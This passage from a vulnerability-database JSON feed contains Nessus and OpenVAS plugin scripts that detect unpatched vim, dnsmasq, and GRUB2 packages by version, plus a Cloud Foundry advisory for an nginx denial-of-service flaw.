Inc.\n\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(121652);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2019/02/07\");\n\n script_cve_id(\"CVE-2016-1248\");\n\n script_name(english:\"Photon OS 1.0: Vim PHSA-2016-0012\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote PhotonOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"An update of the vim package has been released.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/vmware/photon/wiki/Security-Updates-12.md\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected Linux packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-9555\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/12/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/12/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/02/07\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:vmware:photonos:vim\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:photonos:1.0\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"PhotonOS Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/PhotonOS/release\", \"Host/PhotonOS/rpm-list\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/PhotonOS/release\");\nif (isnull(release) || release !~ \"^VMware Photon\") audit(AUDIT_OS_NOT, \"PhotonOS\");\nif (release !~ \"^VMware Photon (?:Linux|OS) 1\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"PhotonOS 1.0\");\n\nif (!get_kb_item(\"Host/PhotonOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"PhotonOS\", cpu);\n\nflag = 0;\n\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"vim-7.4-6.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"vim-extra-7.4-6.ph1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"vim\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-05-03T02:17:13", "bulletinFamily": "scanner", "description": "Enhancement update.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.", "modified": "2020-05-02T00:00:00", "id": "FEDORA_2016-6DB1C9EB69.NASL", "href": "https://www.tenable.com/plugins/nessus/92802", "published": "2016-08-09T00:00:00", "title": "Fedora 23 : dnsmasq (2016-6db1c9eb69)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2016-6db1c9eb69.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(92802);\n script_version(\"2.3\");\n script_cvs_date(\"Date: 2019/09/25 17:12:08\");\n\n script_cve_id(\"CVE-2015-8899\");\n script_xref(name:\"FEDORA\", value:\"2016-6db1c9eb69\");\n\n script_name(english:\"Fedora 23 : dnsmasq (2016-6db1c9eb69)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Enhancement update.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2016-6db1c9eb69\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected dnsmasq package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:dnsmasq\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:23\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/06/30\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/08/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/08/09\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^23([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 23\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC23\", reference:\"dnsmasq-2.76-1.fc23\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"dnsmasq\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2020-05-01T03:00:25", "bulletinFamily": "scanner", "description": "Edwin Torok discovered that Dnsmasq incorrectly handled certain\nCNAME responses. A remote attacker could use this issue to cause\nDnsmasq to crash, resulting in a denial of service.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "modified": "2020-05-02T00:00:00", "id": "UBUNTU_USN-3009-1.NASL", "href": "https://www.tenable.com/plugins/nessus/91725", "published": "2016-06-21T00:00:00", "title": "Ubuntu 15.10 / 16.04 LTS : dnsmasq vulnerability (USN-3009-1)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-3009-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(91725);\n script_version(\"2.9\");\n script_cvs_date(\"Date: 2019/09/18 12:31:45\");\n\n script_cve_id(\"CVE-2015-8899\");\n script_xref(name:\"USN\", value:\"3009-1\");\n\n script_name(english:\"Ubuntu 15.10 / 16.04 LTS : dnsmasq vulnerability (USN-3009-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Edwin Torok discovered that Dnsmasq incorrectly handled certain\nCNAME responses. A remote attacker could use this issue to cause\nDnsmasq to crash, resulting in a denial of service.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/3009-1/\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Update the affected dnsmasq, dnsmasq-base and / or dnsmasq-utils\npackages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:dnsmasq\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:dnsmasq-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:dnsmasq-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:15.10\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:16.04\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/06/30\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/06/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/06/21\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2016-2019 Canonical, Inc. / NASL script (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(15\\.10|16\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 15.10 / 16.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"15.10\", pkgname:\"dnsmasq\", pkgver:\"2.75-1ubuntu0.15.10.1\")) flag++;\nif (ubuntu_check(osver:\"15.10\", pkgname:\"dnsmasq-base\", pkgver:\"2.75-1ubuntu0.15.10.1\")) flag++;\nif (ubuntu_check(osver:\"15.10\", pkgname:\"dnsmasq-utils\", pkgver:\"2.75-1ubuntu0.15.10.1\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"dnsmasq\", pkgver:\"2.75-1ubuntu0.16.04.1\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"dnsmasq-base\", pkgver:\"2.75-1ubuntu0.16.04.1\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"dnsmasq-utils\", pkgver:\"2.75-1ubuntu0.16.04.1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"dnsmasq / dnsmasq-base / dnsmasq-utils\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "cloudfoundry": [{"lastseen": "2019-05-29T18:32:41", "bulletinFamily": "software", "description": "CVE-2016-4450 Nginx Vulnerabilities\n\n# \n\nMedium\n\n# Vendor\n\nnginx, Cloud Foundry\n\n# Versions Affected\n\n * nginx before 1.10.1 and 1.11.x versions before 1.11.1 \n * Cloud Foundry staticfile buildpack prior to version 1.3.9 \n * Cloud Foundry cf-release prior to version 238 \n\n# Description\n\nos/unix/ngx_files.c in nginx before 1.10.1 and 1.11.x before 1.11.1 allows remote attackers to cause a denial of service (NULL pointer dereference and worker process crash) via a crafted request, involving writing a client request body to a temporary file.\n\n# Mitigation\n\nUsers are strongly encouraged to follow one of the mitigations below:\n\n * Upgrade to Cloud Foundry version 238 or later \n * Upgrade the Cloud Foundry staticfile buildpack to version 1.3.9 or later and restage all applications that use automated buildpack detection\n\n# References\n\n * <https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4450>\n", "modified": "2016-07-13T00:00:00", "published": "2016-07-13T00:00:00", "id": "CFOUNDRY:7E643D3894ADF4F839871B17C265A598", "href": "https://www.cloudfoundry.org/blog/cve-2016-4450/", "title": "CVE-2016-4450 Nginx Vulnerabilities | Cloud Foundry", "type": "cloudfoundry", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "openvas": [{"lastseen": "2020-04-07T18:44:55", "bulletinFamily": "scanner", "description": "The remote host is missing a security patch.", "modified": "2020-04-03T00:00:00", "published": "2016-01-19T00:00:00", "id": "OPENVAS:1361412562310105514", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310105514", "title": "F5 BIG-IP - SOL25901386 - GRUB2 vulnerability CVE-2015-8370", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# F5 BIG-IP - SOL25901386 - GRUB2 vulnerability CVE-2015-8370\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/h:f5:big-ip\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.105514\");\n script_cve_id(\"CVE-2015-8370\");\n script_tag(name:\"cvss_base\", value:\"6.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_version(\"2020-04-03T06:15:47+0000\");\n\n script_name(\"F5 BIG-IP - SOL25901386 - GRUB2 vulnerability CVE-2015-8370\");\n\n script_xref(name:\"URL\", value:\"https://support.f5.com/kb/en-us/solutions/public/k/25/sol25901386.html\");\n\n script_tag(name:\"impact\", value:\"This vulnerability can be exploited under certain circumstances, allowing physically proximate attackers to bypass the system's access authentication. By default, the GRUB2 configuration used in F5 products does not expose this issue. The customization of GRUB2 configurations is not supported.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple integer underflows in Grub2 1.98 through 2.02 allow physically proximate attackers to bypass authentication, obtain sensitive information, or cause a denial of service (disk corruption) via backspace characters in the (1) grub_username_get function in grub-core/normal/auth.c or the (2) grub_password_get function in lib/crypto.c, which trigger an 'Off-by-two' or 'Out of bounds overwrite' memory error.\");\n\n script_tag(name:\"solution\", value:\"See the referenced vendor advisory for a solution.\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing a security patch.\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"last_modification\", value:\"2020-04-03 06:15:47 +0000 (Fri, 03 Apr 2020)\");\n script_tag(name:\"creation_date\", value:\"2016-01-19 11:40:40 +0100 (Tue, 19 Jan 2016)\");\n script_category(ACT_GATHER_INFO);\n script_family(\"F5 Local Security Checks\");\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_dependencies(\"gb_f5_big_ip_version.nasl\");\n script_mandatory_keys(\"f5/big_ip/version\", \"f5/big_ip/active_modules\");\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\ninclude(\"list_array_func.inc\");\ninclude(\"f5.inc\");\n\nif( ! version = get_app_version( cpe:CPE ) )\n exit( 0 );\n\ncheck_f5['LTM'] = make_array( 'affected', '12.0.0;11.3.0-11.6.0;',\n 'unaffected', '11.0.0-11.2.1;10.1.0-10.2.4;' );\n\ncheck_f5['AVR'] = make_array( 'affected', '12.0.0;11.3.0-11.6.0;',\n 'unaffected', '11.0.0-11.2.1;' );\n\ncheck_f5['APM'] = make_array( 'affected', '12.0.0;11.3.0-11.6.0;',\n 'unaffected', '11.0.0-11.2.1;10.1.0-10.2.4;' );\n\ncheck_f5['ASM'] = make_array( 'affected', '12.0.0;11.3.0-11.6.0;',\n 'unaffected', '11.0.0-11.2.1;10.1.0-10.2.4;' );\n\ncheck_f5['GTM'] = make_array( 'affected', '11.3.0-11.6.0;',\n 'unaffected', '11.0.0-11.2.1;10.1.0-10.2.4;' );\n\ncheck_f5['LC'] = make_array( 'affected', '12.0.0;11.3.0-11.6.0;',\n 'unaffected', '11.0.0-11.2.1;10.1.0-10.2.4;' );\n\ncheck_f5['PSM'] = make_array( 'affected', '11.3.0-11.4.1;',\n 'unaffected', '11.0.0-11.2.1;10.1.0-10.2.4;' );\n\ncheck_f5['WAM'] = make_array( 'affected', '11.3.0;',\n 'unaffected', '11.0.0-11.2.1;10.1.0-10.2.4;' );\n\ncheck_f5['WOM'] = make_array( 'affected', '11.3.0;',\n 'unaffected', '11.0.0-11.2.1;10.1.0-10.2.4;' );\n\nif( report = f5_is_vulnerable( ca:check_f5, version:version ) ) {\n security_message( port:0, data:report );\n exit( 0 );\n}\n\nexit( 99 );\n", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:35:21", "bulletinFamily": "scanner", "description": "Dnsmasq is prone to a denial of service vulnerability.", "modified": "2018-10-25T00:00:00", "published": "2016-06-15T00:00:00", "id": "OPENVAS:1361412562310106095", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310106095", "title": "Dnsmasq DoS Vulnerability", "type": "openvas", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_dnsmasq_dos_vuln.nasl 12096 2018-10-25 12:26:02Z asteins $\n#\n# Dnsmasq DoS Vulnerability\n#\n# Authors:\n# Christian Kuersteiner <christian.kuersteiner@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2016 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = 'cpe:/a:thekelleys:dnsmasq';\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.106095\");\n script_version(\"$Revision: 12096 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-25 14:26:02 +0200 (Thu, 25 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2016-06-15 12:45:27 +0700 (Wed, 15 Jun 2016)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_cve_id(\"CVE-2015-8899\");\n script_name(\"Dnsmasq DoS Vulnerability\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"This script is Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Denial of Service\");\n script_dependencies(\"dnsmasq_version.nasl\");\n script_mandatory_keys(\"dnsmasq/installed\");\n\n script_xref(name:\"URL\", value:\"http://www.thekelleys.org.uk/dnsmasq/CHANGELOG\");\n script_xref(name:\"URL\", value:\"http://lists.thekelleys.org.uk/pipermail/dnsmasq-discuss/2016q2/010479.html\");\n\n script_tag(name:\"summary\", value:\"Dnsmasq is prone to a denial of service vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Dnsmasq crashes when an A or AAAA record is defined locally,\n in a hosts file, and an upstream server sends a reply that the same name is empty.\");\n\n script_tag(name:\"impact\", value:\"A remote attacker may cause a DoS condition.\");\n\n script_tag(name:\"affected\", value:\"Dnsmasq 2.73 until 2.75\");\n\n script_tag(name:\"solution\", value:\"Upgrade to version 2.76 or later\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nif( ! port = get_app_port( cpe:CPE ) ) exit( 0 );\nif( ! infos = get_app_version_and_proto( cpe:CPE, port:port, exit_no_version:TRUE ) ) exit( 0 );\n\nversion = infos[\"version\"];\nproto = infos[\"proto\"];\n\nif( version_in_range( version:version, test_version:\"2.73\", test_version2:\"2.75\" ) ) {\n report = report_fixed_ver( installed_version:version, fixed_version:\"2.76\" );\n security_message( data:report, port:port, proto:proto );\n exit( 0 );\n}\n\nexit( 99 );\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-05-29T18:35:12", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2016-06-21T00:00:00", "id": "OPENVAS:1361412562310842799", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310842799", "title": "Ubuntu Update for dnsmasq USN-3009-1", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Ubuntu Update for dnsmasq USN-3009-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.842799\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-06-21 05:47:52 +0200 (Tue, 21 Jun 2016)\");\n script_cve_id(\"CVE-2015-8899\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for dnsmasq USN-3009-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'dnsmasq'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Edwin Tö rö k discovered that Dnsmasq\n incorrectly handled certain CNAME responses. A remote attacker could use this\n issue to cause Dnsmasq to crash, resulting in a denial of service.\");\n script_tag(name:\"affected\", value:\"dnsmasq on Ubuntu 16.04 LTS,\n Ubuntu 15.10\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"3009-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3009-1/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU(16\\.04 LTS|15\\.10)\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU16.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"dnsmasq\", ver:\"2.75-1ubuntu0.16.04.1\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"dnsmasq-base\", ver:\"2.75-1ubuntu0.16.04.1\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"dnsmasq-utils\", ver:\"2.75-1ubuntu0.16.04.1\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU15.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"dnsmasq\", ver:\"2.75-1ubuntu0.15.10.1\", rls:\"UBUNTU15.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"dnsmasq-base\", ver:\"2.75-1ubuntu0.15.10.1\", rls:\"UBUNTU15.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"dnsmasq-utils\", ver:\"2.75-1ubuntu0.15.10.1\", rls:\"UBUNTU15.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2020-01-31T18:26:52", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2020-01-31T00:00:00", "published": "2017-01-04T00:00:00", "id": "OPENVAS:1361412562310851464", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310851464", "title": "openSUSE: Security Advisory for dnsmasq 